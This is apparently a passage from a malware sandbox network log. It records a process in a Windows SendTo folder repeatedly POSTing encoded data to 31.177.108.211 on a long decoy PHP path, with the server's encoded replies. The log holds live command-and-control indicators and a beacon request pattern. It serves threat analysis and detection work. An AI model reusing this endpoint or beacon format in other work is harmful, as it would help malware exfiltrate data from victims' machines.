                                          Sep 13, 2024 21:03:24.769686937 CEST1236OUTData Raw: 3f 05 3b 00 2b 57 0f 41 35 3e 01 1f 02 3b 56 3e 38 04 0c 3a 0b 3d 0a 12 39 3c 1e 08 31 3f 3d 27 3f 0a 2e 0c 22 5a 3f 55 31 2c 06 5c 08 5b 14 3b 38 09 0a 04 27 00 5f 53 37 3e 03 2b 23 21 2c 3e 27 36 3a 23 03 1c 5e 1f 33 33 39 21 20 20 56 27 3b 06
                                          Data Ascii: ?;+WA5>;V>8:=9<1?='?."Z?U1,\[;8'_S7>+#!,>'6:#^339! V';")9 9V219=Y9!9?$*>]9=&[] #7YYU6V? W91,%Y;;88)2->> >V38._>"?Z-!T!<W 1:90 =333>+5#=+.%<3:Y*_=8&D>9 788[2Y6>4;E
                                          Sep 13, 2024 21:03:25.030189991 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:25.478893995 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:25.478949070 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:25.479449034 CEST225INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          56192.168.2.45672531.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:24.324970961 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2084
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:24.675961971 CEST2084OUTData Raw: 5b 51 43 50 50 44 59 54 59 5f 51 51 52 51 54 56 5a 58 5a 51 55 51 53 40 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QCPPDYTY_QQRQTVZXZQUQS@PXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9??42)^7)>;+&*8+'3'%<%'29[&!^-
                                          Sep 13, 2024 21:03:25.057286978 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:25.478981018 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 56 3c 35 3f 1d 24 3b 27 19 3b 3e 31 0f 24 3f 28 13 3c 0a 39 44 29 3d 28 5a 39 39 2e 5e 26 38 3d 58 33 12 20 02 27 3f 3b 51 29 2a 2e 46 0d 1d 26 07 3e 2c 34 1e 3e 07 37 05 24 10 22 05 37 33 3f 5f 27 11 38 0d 20 02 22 5a 23 22 2f 55 32 04 3d 13 2f 1b 22 15 2a 31 0c 1c 21 36 2e 55 0f 15 3a 0a 26 1f 36 50 28 22 27 11 29 3c 36 1f 25 59 3c 09 25 5d 37 0b 27 28 03 0e 24 2f 35 12 25 1f 23 5a 3c 03 08 0b 21 22 22 19 35 11 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989V<5?$;';>1$?(<9D)=(Z99.^&8=X3 '?;Q)*.F&>,4>7$"73?_'8 "Z#"/U2=/"*1!6.U:&6P("')<6%Y<%]7'($/5%#Z<!""5'T#(V3YT0
                                          Sep 13, 2024 21:03:25.479090929 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:25 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 56 3c 35 3f 1d 24 3b 27 19 3b 3e 31 0f 24 3f 28 13 3c 0a 39 44 29 3d 28 5a 39 39 2e 5e 26 38 3d 58 33 12 20 02 27 3f 3b 51 29 2a 2e 46 0d 1d 26 07 3e 2c 34 1e 3e 07 37 05 24 10 22 05 37 33 3f 5f 27 11 38 0d 20 02 22 5a 23 22 2f 55 32 04 3d 13 2f 1b 22 15 2a 31 0c 1c 21 36 2e 55 0f 15 3a 0a 26 1f 36 50 28 22 27 11 29 3c 36 1f 25 59 3c 09 25 5d 37 0b 27 28 03 0e 24 2f 35 12 25 1f 23 5a 3c 03 08 0b 21 22 22 19 35 11 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989V<5?$;';>1$?(<9D)=(Z99.^&8=X3 '?;Q)*.F&>,4>7$"73?_'8 "Z#"/U2=/"*1!6.U:&6P("')<6%Y<%]7'($/5%#Z<!""5'T#(V3YT0
                                          Sep 13, 2024 21:03:25.479645014 CEST374INHTTP/1.1 100 Continue
                                          Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 31 33 20 53 65 70 20 32 30 32 34 20 31 39 3a 30 33 3a 32 35 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 0d 0a 39 38 0d 0a 0d 1e 39 56 3c 35 3f 1d 24 3b 27 19 3b 3e 31 0f 24 3f 28 13 3c 0a 39 44 29 3d 28 5a 39 39 2e 5e 26 38 3d 58 33 12 20 02 27 3f 3b 51 29 2a 2e 46 0d 1d 26 07 3e 2c 34 1e 3e 07 37 05 24 10 22 05 37 33 3f 5f 27 11 38 0d 20 02 22 5a 23 22 2f 55 32 04 3d 13 2f 1b 22 15 2a 31 0c 1c 21 36 2e 55 0f 15 3a 0a 26 1f 36 50 28 22 27 11 29 3c 36 1f 25 59 3c 09 25 5d 37 0b 27 28 03 0e 24 2f 35 12 25 1f 23 5a 3c 03 08 0b 21 22 22 19 35 11 27 54 23 00 28 56 [TRUNCATED]
                                          Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Sep 2024 19:03:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveVary: Accept-Encoding989V<5?$;';>1$?(<9D)=(Z99.^&8=X3 '?;Q)*.F&>,4>7$"73?_'8 "Z#"/U2=/"*1!6.U:&6P("')<6%Y<%]7'($/5%#Z<!""5'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          57192.168.2.45672631.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:25.925213099 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:26.269898891 CEST2532OUTData Raw: 5b 54 46 55 55 4b 59 57 59 5f 51 51 52 5f 54 50 5a 5d 5a 5e 55 53 53 42 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TFUUKYWY_QQR_TPZ]Z^USSBPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9D<Y.[ "%^#9>6S+%^*($<?"%3/%)$2<;2+9[&!^-;
                                          Sep 13, 2024 21:03:26.667366982 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:26.823060036 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:26 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          58192.168.2.45672731.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:26.986407995 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:27.332396984 CEST2532OUTData Raw: 5b 50 43 56 50 44 59 51 59 5f 51 51 52 5e 54 56 5a 59 5a 5a 55 56 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [PCVPDYQY_QQR^TVZYZZUVSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9(Y1 !6#=\*&S??:)(<+?63U?&#1?#2+9[&!^-
                                          Sep 13, 2024 21:03:27.741988897 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:27.868176937 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:27 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          59192.168.2.45672831.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:28.732692957 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:29.083277941 CEST2532OUTData Raw: 5b 52 43 5e 50 40 59 52 59 5f 51 51 52 5c 54 5b 5a 58 5a 50 55 5f 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RC^P@YRY_QQR\T[ZXZPU_SIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9A*?*#2173:);"?,6*;(T<?6X$U<P%+& 19[&!^-7
                                          Sep 13, 2024 21:03:29.468070984 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:29.598134041 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:29 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          60192.168.2.45672931.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:29.751075983 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:30.098078012 CEST2532OUTData Raw: 5b 55 46 56 55 41 59 54 59 5f 51 51 52 5c 54 52 5a 5e 5a 5d 55 54 53 41 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [UFVUAYTY_QQR\TRZ^Z]UTSAPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+Y2 "6#U9[>;2=?Y*(0?<'34W%*@&<<';9[&!^-7
                                          Sep 13, 2024 21:03:30.500865936 CEST25INHTTP/1.1 100 Continue


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          61192.168.2.45673031.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:30.510407925 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2084
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:30.863826990 CEST2084OUTData Raw: 5b 52 43 5e 55 40 5c 57 59 5f 51 51 52 5b 54 5b 5a 5f 5a 59 55 5f 53 49 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [RC^U@\WY_QQR[T[Z_ZYU_SIPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:??#T!\70"=(%(?^*8?)3Q%:7@11;9[&!^-+
                                          Sep 13, 2024 21:03:31.254195929 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:31.385715008 CEST349INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 39 38 0d 0a 0d 1e 39 54 3c 18 33 57 24 05 01 18 38 3d 36 52 33 2f 38 59 3c 23 25 43 28 5b 3c 5a 2d 04 00 58 24 3b 08 01 30 05 20 03 24 2c 3b 14 2b 3a 2e 46 0d 1d 25 59 2a 01 20 55 3e 07 28 5c 26 2e 35 17 22 30 38 03 24 59 20 0c 21 3c 2d 05 34 32 3b 55 25 03 29 5c 2d 26 21 06 29 57 26 13 37 0c 2e 55 0f 15 3a 0e 31 31 3a 56 3f 31 27 12 28 3f 3e 1d 26 3c 20 08 25 38 2b 0f 27 5e 25 0d 25 2c 35 12 32 21 20 03 2a 2e 39 10 20 31 21 0f 22 2b 27 54 23 00 28 56 00 33 59 54 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 989T<3W$8=6R3/8Y<#%C([<Z-X$;0 $,;+:.F%Y* U>(\&.5"08$Y !<-42;U%)\-&!)W&7.U:11:V?1'(?>&< %8+'^%%,52! *.9 1!"+'T#(V3YT0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          62192.168.2.45673131.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:30.650429964 CEST578OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Connection: Keep-Alive
                                          Sep 13, 2024 21:03:31.034506083 CEST2532OUTData Raw: 5e 51 43 57 50 46 59 5d 59 5f 51 51 52 58 54 54 5a 5e 5a 5a 55 5e 53 47 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: ^QCWPFY]Y_QQRXTTZ^ZZU^SGPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]9<?1!224\(86R+Y=>;$(?&33&,%_&;9[&!^-'
                                          Sep 13, 2024 21:03:31.432576895 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:31.586093903 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:31 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          63192.168.2.45673231.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:31.719697952 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:32.066732883 CEST2532OUTData Raw: 5b 54 46 51 50 41 59 55 59 5f 51 51 52 5f 54 54 5a 58 5a 5e 55 52 53 43 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [TFQPAYUY_QQR_TTZXZ^URSCPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:*,)45"#9\=+2R(<5*W<<)'U0U%)$$?;1;9[&!^-;
                                          Sep 13, 2024 21:03:32.875997066 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:32.876848936 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0
                                          Sep 13, 2024 21:03:32.877429962 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:32 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
                                          Data Raw: 34 0d 0a 3f 56 40 5a 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: 4?V@Z0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          64192.168.2.45673331.177.108.211808036C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          TimestampBytes transferredDirectionData
                                          Sep 13, 2024 21:03:33.007421017 CEST554OUTPOST /lowimagebetter/VoiddbPoll/wordpressProtonDb/downloadsWindowsjavascriptBigload/temp/37localUpdate/3Temporary/Protect7Datalife/Server5db/BigloadGameProcessRequest/DleProtect4/providerMultidefaultGenerator/Better/5DatalifeVm/mariadb/sqlFlower5/requestwordpressuniversal/Image/Universal5Datalife/secureupdateprocessorgeneratordatalifeDle.php HTTP/1.1
                                          Content-Type: application/octet-stream
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                          Host: 31.177.108.211
                                          Content-Length: 2532
                                          Expect: 100-continue
                                          Sep 13, 2024 21:03:33.363689899 CEST2532OUTData Raw: 5b 51 43 57 50 41 59 54 59 5f 51 51 52 5f 54 52 5a 59 5a 59 55 57 53 48 50 58 42 5e 50 5b 51 5b 5a 5a 52 5c 59 5d 55 5f 59 5e 59 56 52 58 51 44 5b 51 5f 59 46 5a 56 52 54 5f 53 5f 5f 5b 52 5f 5e 51 41 5a 59 5e 59 57 58 59 58 58 58 57 59 5f 5b 5b
                                          Data Ascii: [QCWPAYTY_QQR_TRZYZYUWSHPXB^P[Q[ZZR\Y]U_Y^YVRXQD[Q_YFZVRT_S__[R_^QAZY^YWXYXXXWY_[[_^QDT_TT]XXSTV\XFW]T\]UWYRT^YW[ZUV^\SV\ZXQXY_^[RY[VP__\R]RZ[XTY_QVU__\]Q^R_ZRX[ZX[YZ]UTZ\]XWS\^^PW]TP]:+54#U!=+:(,)Y)+?(9'U1<219[&!^-;
                                          Sep 13, 2024 21:03:33.741781950 CEST25INHTTP/1.1 100 Continue
                                          Sep 13, 2024 21:03:34.095482111 CEST200INHTTP/1.1 200 OK
                                          Server: nginx
                                          Date: Fri, 13 Sep 2024 19:03:33 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          Vary: Accept-Encoding
